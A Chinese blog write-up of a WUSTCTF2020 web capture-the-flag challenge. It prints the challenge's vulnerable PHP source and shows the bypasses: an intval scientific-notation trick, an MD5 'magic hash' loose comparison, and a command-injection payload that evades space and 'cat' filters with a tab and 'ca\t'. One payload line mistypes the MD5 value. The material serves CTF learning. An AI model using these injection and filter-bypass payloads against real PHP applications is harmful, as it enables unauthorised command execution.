[WUSTCTF2020]朴实无华

本文详细解析了一次Web安全挑战中,通过巧妙利用PHP漏洞与字符串操作技巧,成功绕过层层防御,最终获取flag的过程。从理解代码逻辑,到利用科学计数法与MD5特性,再到巧妙绕过过滤器执行命令,每一步都充满了技术智慧。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

在这里插入图片描述
没啥提示,扫下目录
dirsearch 扫到robots.txt
在这里插入图片描述
进去看看
在这里插入图片描述
访问这个假的flag

在这里插入图片描述
扫不到其他东西了,抓个包看看
在这里插入图片描述
藏在这里头去了
看看代码


Warning: Cannot modify header information - headers already sent by (output started at /var/www/html/fl4g.php:2) in /var/www/html/fl4g.php on line 3
<img src="/img.jpg">
<?php
header('Content-type:text/html;charset=utf-8');
error_reporting(0);
highlight_file(__file__);


//level 1
if (isset($_GET['num'])){
    $num = $_GET['num'];
    if(intval($num) < 2020 && intval($num + 1) > 2021){
        echo "我不经意间看了看我的劳力士, 不是想看时间, 只是想不经意间, 让你知道我过得比你好.</br>";
    }else{
        die("金钱解决不了穷人的本质问题");
    }
}else{
    die("去非洲吧");
}
//level 2
if (isset($_GET['md5'])){
   $md5=$_GET['md5'];
   if ($md5==md5($md5))
       echo "想到这个CTFer拿到flag后, 感激涕零, 跑去东澜岸, 找一家餐厅, 把厨师轰出去, 自己炒两个拿手小菜, 倒一杯散装白酒, 致富有道, 别学小暴.</br>";
   else
       die("我赶紧喊来我的酒肉朋友, 他打了个电话, 把他一家安排到了非洲");
}else{
    die("去非洲吧");
}

//get flag
if (isset($_GET['get_flag'])){
    $get_flag = $_GET['get_flag'];
    if(!strstr($get_flag," ")){
        $get_flag = str_ireplace("cat", "wctf2020", $get_flag);
        echo "想到这里, 我充实而欣慰, 有钱人的快乐往往就是这么的朴实无华, 且枯燥.</br>";
        system($get_flag);
    }else{
        die("快到非洲了");
    }
}else{
    die("去非洲吧");
}
?>
去非洲吧

第一关
在这里插入图片描述
在这里插入图片描述
需要他小于2020,加一后又要大于2020
那个函数在用科学计数法的时候,只会保留前面的1
加1后就会
在这里插入图片描述
所以直接传?num=1e10

在这里插入图片描述
第二关要让MD5加密后的值与本身的值相等
直接用脚本跑

def run():
    i = 0
    while True:
        text = '0e{}'.format(i)
        m = md5(text)
        print(text,m)
        if m[0:2] == '0e' :
            if m[2:].isdigit():
                print('find it:',text,":",m)
                break
        i +=1

run()

这脚本跑了我挺久的。。。。。。。

跑出来的值是0e215962017

payloadnum=1e10&md5=0e215963017

最后一关

在这里插入图片描述
相关函数如下
在这里插入图片描述
在这里插入图片描述
他过滤了cat和空格
先ls一下
在这里插入图片描述
看到那一大坨东西,flag在那了
绕过过滤参考文献

绕过空格
在这里插入图片描述
绕过cat

ca\t

payload

num=1e10&md5=0e215962017&get_flag=ca\t%09fllllllllllllllllllllllllllllllllllllllllaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaag

传入得flag
在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值